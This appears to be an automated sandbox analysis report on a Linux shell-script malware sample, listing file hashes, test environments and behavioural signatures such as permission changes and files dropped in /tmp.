Analysis
-
max time kernel
42s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 02:16
Static task
static1
Behavioral task
behavioral1
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6.sh
-
Size
10KB
-
MD5
62cc0d748ce1bc23e334fb8337b1bf09
-
SHA1
6ad81a5d3316adcab7a039a21fa81bfbcbf8b748
-
SHA256
988fd4fe10fa581bbf2b3ffc3df3de6cae7f30da58a71623c0eb40e3adea95f6
-
SHA512
276eac78c58b4d7a6fc6421f2ec0499bfda30e027d56c3602575fe6e71f2a006c4ca64db15c7080c252f02c698df1e83702fe82ac41266fcd0cebb3ba32454f5
-
SSDEEP
192:fgZwipsY9skLiE1Zq/7DlJOqDgAimsY9skyxB1Zq/7DHOqDgAiA:fewiBi19a5UAA
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97